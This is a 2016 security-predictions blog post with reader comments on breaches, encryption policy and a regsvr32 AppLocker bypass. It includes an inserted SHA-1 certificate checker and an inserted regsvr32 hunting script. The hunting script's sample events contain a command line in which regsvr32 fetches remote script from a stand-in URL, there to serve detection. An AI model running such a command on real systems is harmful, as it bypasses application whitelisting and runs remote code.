Security trends for 2016

Here are my predictions for trends in information security and cyber security for year 2016.

Year 2015 was pretty bad for information security, and I would say that the trend is worrying. So I expect that the year 2016 will have many information security challenges. If you want to keep yourself up at night, spend some time reading about the latest developments in cybersecurity. In 2015 airplanes were hacked, cars were hacked, and vulnerabilities were found in a breathtaking range of sensitive equipment, from TSA locks to voting booths to medical devices. The big picture is even scarier. Former NSA Director Mike McConnell suspects China has hacked “every major corporation” in the US. Those problems will continue in 2016 and some new targets for attacks will be found. The system is broken. It isn’t keeping us, our companies, or our government safe. Worse yet, no one seems to know how to fix it.

Attacks through networks are becoming more common all the time. It will be hard to protect against targeted attacks. Hackers will not only customize malware, but they will increasingly use sophisticated phishing and social engineering tricks to gain access to sensitive data. Attackers usually cover their tracks carefully, and identifying who is behind an attack can be very difficult. Behind targeted attacks are usually professional criminals. Criminals do not respect geographical borders, and hence attacks are spread evenly everywhere. Companies will struggle to absorb the security threats of combined PC and mobile devices in 2016.


EU information security decisions made in late 2015 will have an impact on what comes in 2016: the new EU data protection legislation package was approved, and the EU Court of Justice ruled that the Safe Harbor procedure is invalid. This means that transfers of personal data from EU countries to the United States under Safe Harbor are a violation of law – you need some other agreement for this. The situation will probably get clarified during 2016. Data protection legislation changes will lead to increased fines for the unprepared. Legal uncertainty and big fines are a toxic cocktail for some companies. The combination of stiff penalties and ambiguously worded provisions in the new EU-wide data protection law, which would replace a patchwork of 28 national laws, raises daunting prospects for companies operating in Europe.

After the huge number of user information leaks in 2015 from all kinds of Internet services, cloud companies will face challenges in gaining trust in their security. You might have only just dared to trust “the right cloud services,” since from the traditional information security point of view they seemed to have the main things in order; now the privacy issues that have been raised put that trust in question.

New environments will bring new threats. New operating system versions mean that administrators and users are less familiar with the environments. IPv6 will get more widely used, and the security of IPv6 networks is different from IPv4. Organizations are moving to virtualized environments, which are complex and create network layers that can become an attack vector. Growing network virtualization functionality and programmability are both an opportunity and a threat to security. Cyber security research will be important in 2016, as 5G networks will be critical infrastructure on top of which, for example, transport, industry, health and the new operators will set up their business around 2020.

The huge amount of information security news is becoming harder and harder to manage in 2016. A key problem with security revelations, as with all other news coverage, is the exponential growth of information. There are a variety of news summaries produced on a daily basis, but they are not enough to get a good picture of what is happening. There are bigger and smaller news items, the impact of which is at times very difficult to assess. SMBs will become a bigger target for cybercriminals. Network and security professionals continue to be among the toughest IT talent to find and hire.

The old way of network security, focused on perimeter defense, is not enough in 2016. The old mantras “encrypt everything” and “secure the perimeter” are not enough. One deceptive truth seems to drive much of the cybersecurity industry down a rabbit hole: if you keep bad actors and bad software out of your system, you have nothing to worry about. It does not work like that anymore. As perimeter security gets stronger, malicious actors are looking for easier entry points to compromise an organisation through the breadth of its digital attack surface. Now malicious actors target “endpoints”—any device or sensor connected to a network—to break into that network. Traditional sandboxing will no longer protect against the growing malware landscape. Today, most private networks have far too many endpoints to properly secure. In an age of “Bring Your Own Device,” the cloud, remote access, and the Internet of Things, there are too many vulnerabilities hackers can exploit. Keep in mind that everything connected to the Internet can, and will, be hacked. To address those threats in 2016, security experts should assume compromise – that hackers and malware already have breached their defenses, or soon will – and instead classify and mitigate threats. In addition to the public key infrastructure lock-and-key system, you will also need an integrity solution that acts like an alarm. To protect against advanced threats, security professionals will increase their reliance on centralized security management solutions. You need to have prioritization and response plans for various kinds of breaches – with a strong focus on integrity.

The tension between law enforcement and Silicon Valley will continue to be strong throughout 2016. In 2015, law enforcement and politicians on both sides of the Atlantic lined up to repeatedly complain that the web was “going dark” as a result of end-to-end encryption and that this was hampering the investigation of terrorism and other serious crimes. Technologists and cryptographers argue that governments are trying to weaken encryption by demanding some form of privileged access for government. It’s not clear how much encryption the NSA can break. With renewed focus on how encrypted messages can be used to plot terrorist attacks, President Barack Obama’s administration is stepping up pressure on the tech sector to help in the battle. Privacy remains a major counter-argument. It seems that governments lie about encryption backdoors. Encryption systems weakened by mandated backdoors would not be effective in fighting the terrorists that governments invoke as their reason for wanting those backdoors in the first place.

But this does not stop some government officials from demanding such things, with varying success in different countries. Another fact is that the existence of coded communications is a reality, and the U.S. may not be able to do much about it because nearly everyone living in modern society uses it: encryption protects your bank information, prevents your password from being stolen when you log into a website, and allows all e-commerce transactions to take place securely. Encryption weakened by mandated backdoors would put all of us at an enormous risk of exposure from data breaches and associated online risks. The truth in 2016 is that any form of privileged access for government – i.e., a backdoor – would inevitably weaken crypto-systems and make them more vulnerable to attacks by foreign governments’ intelligence agencies as well as criminals. Juniper’s VPN security hole is proof that government backdoors are bonkers. Encryption backdoors would be a gleeful win-win for terrorists and a horrific lose-lose for you – the bad guys having strong protections for their data, and the rest of us not. Poorly thought-out and crude surveillance techniques could have a devastating effect on a country’s internet security; for example, Kazakhstan will force its citizens to install internet backdoors by requiring all Internet users to install a state-issued root certificate by January 1, 2016.

Google, Mozilla and Microsoft are pushing for an early SHA-1 crypto cutoff that could happen in 2016 instead of the earlier planned January 1st, 2017. This is due to recent research showing that SHA-1 is weaker than previously believed, because it has been cracked without enormous effort. Mozilla, Microsoft and now Google are all considering bringing the deadline forward by six months to July 1, 2016. SHA-2 is going to be used as the replacement function for SHA-1. Websites like Facebook and those protected by CloudFlare have implemented a SHA-1 fallback mechanism for those systems that do not support SHA-2. Chrome will start displaying errors if SHA-1 certificates are employed in early 2016 and will completely stop supporting SHA-1 certificates at the end of 2016.
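As an added worked example (not from the original post), here is a small checker that pulls the signature algorithm and notAfter date out of a DER-encoded certificate and rates it against the two cutoff dates above. The minimal DER walker, the UTCTime-only date handling and the constructed certificate skeleton used as a fixture are assumptions of this example; it uses only the Python standard library.

```python
from datetime import datetime, timezone

# Signature-algorithm OIDs: SHA-1 with RSA / DSA / ECDSA, and SHA-256 with RSA.
SHA1_OIDS = {"1.2.840.113549.1.1.5", "1.2.840.10040.4.3", "1.2.840.10045.4.1"}
SHA256_RSA = "1.2.840.113549.1.1.11"
PROPOSED_CUTOFF = datetime(2016, 7, 1, tzinfo=timezone.utc)  # proposed early cutoff
PLANNED_CUTOFF = datetime(2017, 1, 1, tzinfo=timezone.utc)   # originally planned cutoff

def _read_tlv(buf, pos):
    """Return (tag, content, next_pos) for the DER element starting at pos."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:  # long form: low bits give the number of length bytes
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def _children(content):
    """Split the content of a SEQUENCE into a list of (tag, content) elements."""
    out, pos = [], 0
    while pos < len(content):
        tag, value, pos = _read_tlv(content, pos)
        out.append((tag, value))
    return out

def _decode_oid(content):
    arcs, acc = [content[0] // 40, content[0] % 40], 0
    for b in content[1:]:  # base-128 arcs, high bit set on all but the last byte
        acc = (acc << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(acc)
            acc = 0
    return ".".join(map(str, arcs))

def _decode_utctime(content):
    """UTCTime YYMMDDHHMMSSZ; RFC 5280 maps two-digit years < 50 to 20xx."""
    s = content.decode("ascii")
    s = ("20" if int(s[:2]) < 50 else "19") + s
    return datetime.strptime(s, "%Y%m%d%H%M%SZ").replace(tzinfo=timezone.utc)

def inspect_certificate(der):
    """Return (signature algorithm OID, notAfter) of a DER-encoded X.509 certificate."""
    _, body, _ = _read_tlv(der, 0)
    tbs, sig_alg, _signature = _children(body)
    fields = _children(tbs[1])
    if fields[0][0] == 0xA0:  # optional [0] EXPLICIT version
        fields = fields[1:]
    # fields: serialNumber, signature, issuer, validity, subject, subjectPublicKeyInfo, ...
    not_after = _children(fields[3][1])[1][1]
    alg_oid = _decode_oid(_children(sig_alg[1])[0][1])
    return alg_oid, _decode_utctime(not_after)

def sha1_status(der):
    """Rate a certificate against the SHA-1 sunset dates discussed in the text."""
    alg, not_after = inspect_certificate(der)
    if alg not in SHA1_OIDS:
        return "ok"
    if not_after >= PLANNED_CUTOFF:
        return "sha1-valid-past-2017-cutoff"
    if not_after >= PROPOSED_CUTOFF:
        return "sha1-valid-past-proposed-2016-cutoff"
    return "sha1-expires-before-cutoffs"

# --- constructed fixture: a structurally minimal certificate skeleton, not a real cert ---
def _der(tag, content):
    assert len(content) < 0x80, "fixture uses short-form lengths only"
    return bytes([tag, len(content)]) + content

def _encode_oid(dotted):
    arcs = [int(a) for a in dotted.split(".")]
    body = bytes([arcs[0] * 40 + arcs[1]])
    for arc in arcs[2:]:
        chunk, arc = [arc & 0x7F], arc >> 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        body += bytes(reversed(chunk))
    return _der(0x06, body)

def build_test_cert(sig_oid, not_after):
    alg = _der(0x30, _encode_oid(sig_oid) + b"\x05\x00")  # AlgorithmIdentifier, NULL params
    utc = lambda d: _der(0x17, d.strftime("%y%m%d%H%M%SZ").encode("ascii"))
    validity = _der(0x30, utc(datetime(2015, 1, 1)) + utc(not_after))
    empty_name = _der(0x30, b"")
    tbs = _der(0x30, _der(0xA0, b"\x02\x01\x02") + _der(0x02, b"\x01") + alg
               + empty_name + validity + empty_name + _der(0x30, b""))
    return _der(0x30, tbs + alg + _der(0x03, b"\x00\xAA"))

def demo():
    """Run constructed fixtures through the checker; returns {label: status}."""
    cases = {
        "sha1-long-lived": ("1.2.840.113549.1.1.5", datetime(2017, 3, 1)),
        "sha1-mid-2016": ("1.2.840.113549.1.1.5", datetime(2016, 9, 1)),
        "sha1-short": ("1.2.840.113549.1.1.5", datetime(2016, 3, 1)),
        "sha256": (SHA256_RSA, datetime(2017, 3, 1)),
    }
    return {label: sha1_status(build_test_cert(*args)) for label, args in cases.items()}

if __name__ == "__main__":
    for label, status in demo().items():
        print(label, status)
```

For a real certificate, feed the DER bytes of the leaf (and each intermediate, since a SHA-1 intermediate is flagged by browsers just the same) to `sha1_status`.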

The use of Blockchain technology, a permissionless distributed database based on the bitcoin protocol that runs across a global network of independent computers, will get used more widely than just for Bitcoin virtual money. With bitcoin, Blockchain tracks the exchange of money. But it can also track the exchange of anything else that holds value, including stocks, bonds, and other financial securities. Overstock has already used the blockchain to issue private bonds. The Securities and Exchange Commission has approved a plan from online retailer Overstock.com to issue company stock via the Internet, signaling a significant shift in the way financial securities will be distributed and traded in the years to come. Overstock built its technology under the aegis of a subsidiary called TØ.com, and it plans to offer this “cryptosecurity” tech as a service to other businesses. Nasdaq OMX—the company behind the Nasdaq stock exchange—is using the blockchain to oversee the exchange of private stock. Also several major companies from across both the technology and financial industries—including IBM, Intel, and Cisco as well as the London Stock Exchange Group and big-name banks JP Morgan, Wells Fargo, and State Street—have joined forces with the Linux Foundation to create an alternative to the blockchain.

The use of disk encryption will increase, and there are different ways to do it with different security levels. Microsoft has introduced Windows 10 disk encryption where the recovery keys are uploaded to Microsoft. This approach has some advantages and disadvantages. The gold standard in disk encryption is end-to-end encryption, where only you can unlock your disk. This is what most companies use, and it seems to work well. It protects data in case your device is lost or stolen. But what if you forget or lose your key? There are certainly cases where it’s helpful to have a backup of your key or password – so keeping a backup of your recovery key in your Microsoft account could be genuinely useful for probably the majority of users who don’t have high security needs. The disadvantage of this approach is that your computer is now only as secure as that database of keys held by Microsoft, which means it may be vulnerable to hackers, foreign governments, and people who can extort Microsoft employees.


Weak and leaked passwords are still a huge security problem in 2016. Passwords are often the weakest part when it comes to securing users’ accounts, as many don’t use complex passwords or they reuse the same password across services. Two-factor authentication – like using a USB stick with a secret token or entering a code sent via text message to your phone – can help to increase security, but many users also find this to be a hassle as it introduces an additional step to the login process.

Google has begun testing a login system that uses phone notifications for authentication instead of passwords: users authenticate by responding to a notification sent to their smartphone. The idea is similar to Yahoo’s recently launched “Account Key,” which also offers a password-free means of signing in, involving a push notification sent to your phone that then opens an app where you approve the log-in.

The smartphone will become a more and more security-critical part of your life. “Increasingly, individuals and organisations are adopting password managers and multi-factor authentication technologies to plug some of the holes in password-based authentication. We foresee a world where practically everyone uses their smartphone as a multi-factor authentication element. In this world, the smartphone becomes your most valuable asset: something that enables you to unlock your life online and a target for attackers seeking to access your services.”

Expect that the number of mobile vulnerabilities will only grow in 2016. In 2016 we will see increasing numbers of cyber criminals using mobile applications to spread malware. Mobile presents an easy target for cyber criminals, because it is an attack surface that is open and extremely difficult to defend once an app has been released. Android threats will become more than just headline-grabbers. Will 2016 be the year iOS malware goes mainstream?


Critical infrastructures will be highly targeted in 2015. SCADA and ICS networks were not designed for security. Attacks against these systems have increased in recent years, and I expect this trend to only get worse. There are still many companies that run their critical systems on Windows XP, as “there are some people who don’t have an option to change.” Many times the OS is running in automation and process control systems that run business- and mission-critical systems, both in private sector and government enterprises. For example, the US Navy is using the obsolete operating system Microsoft Windows XP to run critical tasks. It all comes down to money and resources, but if someone is obliged to keep something running on an obsolete system, it’s completely the wrong approach to information security.

Cars were hacked at a record rate in 2015, and they will be hacked at least at the same rate in 2016. Modern cars are featuring more gadgetry and connected systems, and this will make vehicles just as vulnerable to today’s threats and attacks. I Am The Cavalry has published a Five Star Cyber Safety Framework to mitigate this threat in cars; hopefully car component makers study it.

IoT and smart devices are still at risk. The Internet of Things will continue to emerge, and businesses will need to think about how to protect their smart devices and prepare for the wider adoption of IoT. IoT platforms are not yet the weapon of choice for commercial malware authors – but businesses beware. Wearables won’t be safe either, as they are built using largely the same, too often vulnerable, technologies as other IoT systems. IoT security is still in its infancy in 2016.

Cyber criminals became more active in 2015, particularly with ransomware. The ransomware problem will continue to be big in 2016. Commercial malware authors will continue to invest heavily, and exploit kits will continue to dominate on the web. Ransomware today is big business. Ransomware takes control of a computer and holds it hostage until the victim pays, usually in the digital currency Bitcoin. As a remedy against ransomware I recommend ensuring with your IT support or service provider that the data backup and restore procedure is operational, practiced and tested. You may need it in 2016 to get your data back without considering paying criminals. To date ransomware has hit Windows users hardest, although Android and MacOS users are now also facing similar extortion.

Ransomware will continue to dominate in 2016, and it is only a question of time before we see things beyond data being ransomed. We have already seen websites being held to ransom with DDoS. Intel’s McAfee Labs also noted a huge spike in ransomware in early 2015, and worries about ransomware in the IoT space—including medical devices. And Kaspersky predicts the “nightmare of ransomware” to continue and “spread to new frontiers” in 2016. The article Ransomware Is Coming to Medical Devices tells that according to a report released recently by Forrester Research, the number one cybersecurity prediction for 2016 is: “We’ll see ransomware for a medical device or wearable.” “It’s definitely feasible from a technical standpoint.” Networked medical devices save lives. Despite the hacking risk, it’s an informed trade-off. Medical device ransomware would be a modern form of highway robbery with lives at stake.

2,232 Comments

  1. Tomi Engdahl says:

    Philippines Arrests Alleged Election Website Hacker
    http://www.securityweek.com/philippines-arrests-alleged-election-website-hacker

    Philippine officials said Thursday they have arrested a suspect in the hacking of the national election agency’s website ahead of next month’s presidential polls.

    The 23-year-old male suspect, who was arrested in Manila on Wednesday, told police he merely defaced the site to expose its vulnerability to potential breaches, they said.

    An Internet security firm has described the March 27 incident as potentially the world’s biggest government-related data breach, but officials said they had yet to verify if the released information had come from the Commission on Elections database.

    “He said he had no intention to harm. We got the computer he used so our forensic examination on the extent of the breach is ongoing,”

    “There are birthdays, ages, passport information. If it’s a faithful copy, they just had access to a bunch of this information but this is publicly accessible in general. Birthdays can be searched,” Jimenez said.

  2. Tomi Engdahl says:

    Hackers stole $80 million from a central bank because it had $10 routers and no firewall
    http://uk.businessinsider.com/r-bangladesh-bank-exposed-to-hackers-by-cheap-switches-no-firewall-police-2016-4?r=US&IR=T

    DHAKA (Reuters) – Bangladesh’s central bank was vulnerable to hackers because it did not have a firewall and used second-hand, $10 switches to network computers connected to the SWIFT global payment network, an investigator into one of the world’s biggest cyber heists said.

    The shortcomings made it easier for hackers to break into the system earlier this year and attempt to siphon off nearly $1 billion using the bank’s SWIFT credentials, said Mohammad Shah Alam, head of the Forensic Training Institute of the Bangladesh police’s criminal investigation department.

    “It could be difficult to hack if there was a firewall,” Alam said.

    The lack of sophisticated switches, which can cost several hundred dollars or more, also means it is difficult for investigators to figure out what the hackers did and where they might have been based, he added.

    The police believe both the bank and SWIFT should take the blame for the oversight, Alam said in an interview.

    SWIFT has previously said the attack was related to an internal operational issue at Bangladesh Bank and that SWIFT’s core messaging services were not compromised.

    Cyber criminals broke into the bank’s systems and tried to make fraudulent transfers totalling $951 million from its account at the Federal Reserve Bank of New York in early February.

    Most of the payments were blocked but $81 million was routed to accounts in the Philippines and diverted to casinos there. Most of those funds remain missing.

    Lax Security

    Bangladesh Bank has about 5,000 computers used by officials in different departments, Alam said.

    The SWIFT room is roughly 12 feet by 8 feet, a window-less office located on the eighth floor of the bank’s annex building in Dhaka. There are four servers and four monitors in the room.

    All transactions from the previous day are automatically printed on a printer in the room.

    The SWIFT facility should have been walled off from the rest of the network.

    Communications between the Fed and the Bangladesh central bank were hampered and the heist was discovered only after a delay.

    The heist, which sent alarm bells ringing across the global financial system about cyber security, has turned into a global whodunit.

    Here’s How Hackers Stole $80 Million from Bangladesh Bank
    Monday, March 14, 2016 Swati Khandelwal
    http://thehackernews.com/2016/03/bank-hacking-malware.html

    How the Hackers managed to transfer $80 Million without leaving any Trace?

    Although the malware type has not been identified, the malicious software likely included spying programs that let the group learn how money was processed, sent and received.

    The malware in question could be a potential Remote Access Trojan (RAT) or a similar form of spyware that gave attackers the ability to gain remote control of the bank’s computer.

    The investigators suspect the hack could have exploited a “zero-day” flaw as they are unknown to vendors as well.

    After this, the hackers were able to steal the Bangladesh Bank’s credentials for the SWIFT messaging system, a highly secure financial messaging system utilized by banks worldwide to communicate with each other.

  3. Tomi Engdahl says:

    Core Windows Utility Can Be Used To Bypass Whitelisting
    https://it.slashdot.org/story/16/04/22/1513231/core-windows-utility-can-be-used-to-bypass-whitelisting

    A core Windows command-line utility, Regsvr32, used to register DLLs to the Windows Registry can be abused to run remote code from the Internet, bypassing whitelisting protections such as Microsoft’s AppLocker.

    “It’s built-in remote code execution without admin rights and which bypasses Windows whitelisting. I’d say it’s pretty bad,”

    Bypass the Windows AppLocker bouncer with a tweet-size command
    Oh, you weren’t relying on that to lockdown your PCs, were you?
    http://www.theregister.co.uk/2016/04/22/applocker_bypass/

    If you’re relying on Microsoft’s AppLocker to lock down your office or school Windows PCs, then you should check this out. A security researcher says he’s found a way to potentially bypass the operating system’s software whitelist and launch arbitrary applications.

    A security researcher called Casey Smith has found that AppLocker can be potentially bypassed with a pretty simple command – thanks to the fact that Microsoft built a HTTP fetcher into one of its core utilities.

    JavaScript, Visual Basic and Powershell scripts can be run from the internet, or a local file, via regsvr32, according to Smith.

    “It’s built-in remote code execution without admin rights and which bypasses Windows whitelisting. I’d say it’s pretty bad,” said Alex Ionescu, a Windows and ARM kernel guru.

    Infosec researcher Kenn White said: “This just made a lot of corporate penetration testers very, very happy.”

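A defender's companion to the comment above, added here and not part of the original comments: a small hunting heuristic over process-creation events that flags regsvr32 fetching script from a URL, loading it from a user-writable path, or running under a document-handling parent, since application whitelisting alone will not catch it. The event field names and the sample events are constructed for this demo, not real telemetry.

```python
import re

# Constructed sample of Windows process-creation events (fields as a Sysmon/4688-style
# collector might present them); these are made up for the demo, not real telemetry.
SAMPLE_EVENTS = [
    {"ts": "2016-04-22T10:01:05Z", "host": "ws01",
     "parent": r"C:\Windows\System32\msiexec.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\plugin.dll"'},   # normal installer use
    {"ts": "2016-04-22T10:07:41Z", "host": "ws02",
     "parent": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s /i:http://example.invalid/script plugin.dll"},  # HTTP fetch
    {"ts": "2016-04-22T10:09:12Z", "host": "ws03",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},                                        # unrelated noise
    {"ts": "2016-04-22T10:12:58Z", "host": "ws04",
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "cmdline": r"regsvr32.exe /i:C:\Users\bob\AppData\Local\Temp\x.sct plugin.dll"},  # local-file variant
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
USER_WRITABLE_RE = re.compile(r"\\Users\\|\\Temp\\|\\AppData\\", re.IGNORECASE)
# Parents under which regsvr32 has no legitimate business (assumed list, extend per environment).
DOC_HANDLERS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                "chrome.exe", "firefox.exe", "iexplore.exe")


def classify(event):
    """Return the reasons an event looks like regsvr32 being used as a script loader."""
    if not event["image"].lower().endswith("\\regsvr32.exe"):
        return []
    cmd, reasons = event["cmdline"], []
    if URL_RE.search(cmd):
        reasons.append("remote-url-argument")            # the built-in HTTP fetcher pulling code in
    if USER_WRITABLE_RE.search(cmd):
        reasons.append("script-from-user-writable-path") # the "or a local file" case
    parent = event["parent"].lower().rsplit("\\", 1)[-1]
    if parent in DOC_HANDLERS:
        reasons.append(f"spawned-by-{parent}")           # launched from a document or browser
    return reasons


def hunt(events):
    """Return (timestamp, host, reasons) for every event the heuristics flag."""
    findings = []
    for event in events:
        reasons = classify(event)
        if reasons:
            findings.append((event["ts"], event["host"], reasons))
    return findings


if __name__ == "__main__":
    for ts, host, reasons in hunt(SAMPLE_EVENTS):
        print(ts, host, ", ".join(reasons))
```

Plain `/s <dll>` registrations from installers are left alone, so the rule stays quiet on the common benign use while surfacing the two patterns the article describes.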
  4. Tomi Engdahl says:

    Jenna McLaughlin / The Intercept:
    Boston district court judge rules FBI hacking in child porn sting was illegal because magistrate judge that issued the search warrant was in another district — FBI Mass Child-Porn Hack Ruled Illegal on a Technicality — When the FBI hacked over 1,000 computers to ensnare consumers …

    FBI Mass Child-Porn Hack Ruled Illegal on a Technicality
    https://theintercept.com/2016/04/21/fbi-mass-child-porn-hack-ruled-illegal-on-a-technicality/

    When the FBI hacked over 1,000 computers to ensnare consumers of child pornography early last year, its actions were illegal, a federal judge ruled Wednesday.

    But the decision was based on a violation of jurisdictional rules, not constitutional ones — and precisely the jurisdictional rules the government hopes the Supreme Court will change within the next few weeks.

    In this case, a magistrate judge approved a warrant allowing the FBI to deploy malware to infect every visitor to a child-porn website called Playpen. Because users of the site were using Tor, a popular anonymity tool, the FBI couldn’t figure out who they were or where they were coming from — until the malware revealed their IP addresses.

    According to Rule 41 of federal criminal procedure, magistrate judges can’t authorize a warrant outside their geographical jurisdiction.

    The Department of Justice is seeking to change that rule, but it hasn’t happened yet.

    Government lawyers two years ago began the multi-stage process of changing the rule to allow judges to grant warrants for remote searches of computers located outside their district or when the location is unknown. Despite angry protests from civil liberties advocates and technologists

    “The judge clearly is not happy about the government operating a child-porn site,”

  5. Tomi Engdahl says:

    Office of Inadequate Security:
    An unsecured database with 93.4M Mexican voter records found hosted on AWS, now taken offline

    Personal info of 93.4 million Mexicans exposed on Amazon (UPDATED)
    http://www.databreaches.net/personal-info-of-93-4-million-mexicans-exposed-on-amazon/

    In today’s installment of “Epic Infosecurity #FAIL,” more than 93.4 million Mexican citizens have had their voter registration details exposed online due to a misconfigured database. Why a database with Mexican voters’ information was hosted on a server outside of Mexico, who uploaded it to Amazon, and why it wasn’t properly secured are questions in search of answers.

    Last week, MacKeeper Security Researcher Chris Vickery contacted DataBreaches.net to report that he had discovered yet another misconfigured MongoDB database. This one, 132 GB in size, appeared to contain voter registration data from 93,424,710 Mexican citizens.

    The record contains the individual’s name, complete address, date of birth, mother’s and father’s last names, occupation, and their unique voting credential code (number/identifier).

    Although there was no information included in the leaky database that could point us to its owner or who had uploaded it to Amazon cloud services, the data appeared to be voter registration data compiled by the Instituto Nacional Electoral (INE).

    After some discussion as to whom to notify and how, Chris decided to report his discovery to the State Department and let them contact their Mexican counterparts in the spirit of cooperation. When he got no meaningful response, he reached out to the State Department’s Office of Mexican Affairs, who told him they would forward his alert up the chain. When that still didn’t achieve the desired results of getting the database secured, Chris contacted the U.S. Secret Service, Department of Homeland Security, and US-CERT. He also contacted the Mexican embassy directly:

    After I explained the situation over the phone, they wanted proof of the breach and gave me an email address to send it to. I sent them an explanation with the IP address and two screenshots as evidence. The embassy has never even responded to that email.

    (First lesson to be learned by INE: provide an easy-to-find email address on your web site for people to report security breaches.)

    As fate would have it, though, Chris was speaking up at Harvard about his research and mentioned the leak. A student from Mexico verified the accuracy of his father’s record, and a faculty member tried to assist Chris with the notification problem by giving him other individuals to contact. Chris eventually heard back from someone from the Instituto Federal Electoral, (IFE/INE), who thanked Chris and who said they would get right on getting it secured. Of note, the coordinator said that the IP address was not theirs and he was investigating to see who was responsible for the database being on that IP address.

    The database has now been secured.

    Publication of this post was delayed until now at the request of the Mexican government to give them time to investigate and to secure the database.

    The Risk to Mexican Citizens

    This is not the first time voter registration information of Mexican citizens has been leaked or otherwise compromised. In what became an international incident in 2003, Latin American countries learned that ChoicePoint was buying – and selling – information on citizens of their countries.

    “This incident clearly erodes the confidence of citizens in a lot of government bodies. Some citizens might decide to never provide their data again to the INE, the next time their ID expires,”

    Entire Countries Breached

    With this leak, Mexico now joins a list of countries where almost the entire population has had their personal information leaked or breached, as 93.4 million represents over 72% of Mexico’s estimated population. Belize, Greece, Israel, Philippines, and Turkey have also experienced leaks of the majority of their population’s personal information. And of course, let’s not forget that Chris Vickery had also discovered 191 million U.S. voters’ data leaking due to a similarly misconfigured database.

    BREAKING: Massive Breach of Mexican Voter Data
    https://mackeeper.com/blog/post/217-breaking-massive-data-breach-of-mexican-voter-data

    In my hands is something dangerous. It is proof that someone moved confidential government data out of Mexico and into the United States. It is a hard drive with 93.4 million downloaded voter registration records— The Mexican voter database.

    Before going any further, let’s make one thing very clear. I’m not the one who transmitted the data out of Mexico. Someone else will have to answer for that. However, eight days ago (April 14th), I did discover a publicly accessible database, hosted on an Amazon cloud server, containing these records. There was no password or authentication of any sort required. It was configured purely for public access. Why? I have no clue.

    After reporting the situation to the US State Department, DHS, the Mexican Embassy in Washington, the Mexican Instituto Nacional Electoral (INE), and Amazon, the database was finally taken offline April 22nd, 2016.

    Under Mexican law, these files are “strictly confidential”, carrying a penalty of up to 12 years in prison for anyone extracting this data from the government for personal gain. We’re talking about names, home addresses, birthdates, a couple of national identification numbers, and a few other bits of info.

  6. Tomi Engdahl says:

    Ashley Madison Hack Victims Can’t Sue Anonymously

    If you want to sue Ashley Madison for the hack that leaked the names of its customers, you’ll have to use your real name, which sounds like a fun way to relive a terrible day.

    More Than a Million People Access Facebook Over Tor

    Opera Adds a VPN to Its Browser

    Though they’re mostly known for helping people dodge regional content restrictions, VPNs can be handy for all kinds of things, including masking your online activity. They can require a little bit of technological know-how, though, or at the very least an extra download. But wait! The latest developer version of the Opera desktop browser now has a (free) VPN built right in.

    Tech Giants Pen Open Letter Opposing Proposed Encryption Bill

    The Burr-Feinstein encryption bill is historically bad, and the Reform Government Surveillance group would like Congress to know it.

    Source: http://www.wired.com/2016/04/security-week-sue-ashley-madison-youll-use-real-name/

  7. Tomi Engdahl says:

    Chinese takeover target Opera Software embeds browser security tool
    http://www.reuters.com/article/us-opera-software-m-a-china-idUSKCN0XI1GN

    Norwegian online browser and advertising firm Opera Software , the takeover target of a Chinese consortium of Internet firms, has embedded a tool in its latest desktop app that can be used to circumvent censorship.

    Opera said on its blog on Thursday that the newest version of its desktop Internet browser, which is targeted at developers, includes a free built-in Virtual Private Network (VPN), which can be used for getting round online censorship.

    “Regarding China we already have servers in China and are running this through a Chinese IT company which is in compliance with Chinese laws,” Opera CEO Lars Boilesen told Reuters.

    “China is not a huge market for us on desktop. So this launch has nothing to do with China,” he said.

    Opera is the subject of a $1.28 billion acquisition by a consortium of Chinese firms, including web search and security firm Qihoo 360 Technology Co Ltd and Beijing Kunlun Tech Co.

    Reply
  8. Tomi Engdahl says:

    Reuters:
    $81M hack of Bangladesh central bank made possible by second-hand $10 switches linking computers connected to SWIFT global payment network, and no firewall — Bangladesh Bank exposed to hackers by cheap switches, no firewall: police — Bangladesh’s central bank was vulnerable to hackers …

    Bangladesh Bank exposed to hackers by cheap switches, no firewall: police
    http://www.reuters.com/article/us-usa-fed-bangladesh-idUSKCN0XI1UO

    Bangladesh’s central bank was vulnerable to hackers because it did not have a firewall and used second-hand, $10 switches to network computers connected to the SWIFT global payment network, an investigator into one of the world’s biggest cyber heists said.

    The shortcomings made it easier for hackers to break into the Bangladesh Bank system earlier this year and attempt to siphon off nearly $1 billion using the bank’s SWIFT credentials, said Mohammad Shah Alam, head of the Forensic Training Institute of the Bangladesh police’s criminal investigation department.

    “It could be difficult to hack if there was a firewall,” Alam said in an interview.

    Reply
  9. Tomi Engdahl says:

    Eric Lichtblau / New York Times:
    Six prominent ex-national security officials, who now work at firms with ties to the tech sector, support Apple on encryption

    On Encryption Battle, Apple Has Advocates in Ex-National Security Officials
    http://www.nytimes.com/2016/04/23/business/on-encryption-battle-apple-has-advocates-in-ex-national-security-officials.html

    WASHINGTON — In their years together as top national security officials, Michael V. Hayden and Michael Chertoff were fierce advocates of using the government’s spying powers to pry into sensitive intelligence data.

    But today, their jobs have changed, and so, apparently, have their views on privacy. Both former officials now work with technology companies like Apple at a corporate consulting firm that Mr. Chertoff founded, and both are now backing Apple — and not the F.B.I., with which they once worked — in its fight to keep its iPhones encrypted and private.

    They are among more than a half-dozen prominent former national security officials who, to varying degrees, have supported Apple and the idea of impenetrable “end-to-end encryption” during a furious national debate over the balance between privacy and security in the digital age.

    Reply
  10. Tomi Engdahl says:

    Ad-blocker blocking websites face legal peril at hands of privacy bods
    Publisher’s software could break EU cookie laws
    http://www.theregister.co.uk/2016/04/23/anti_ad_blockers_face_legal_challenges/

    Websites that detect ad-blockers to stop their users from reading webpages could be illegal under European law.

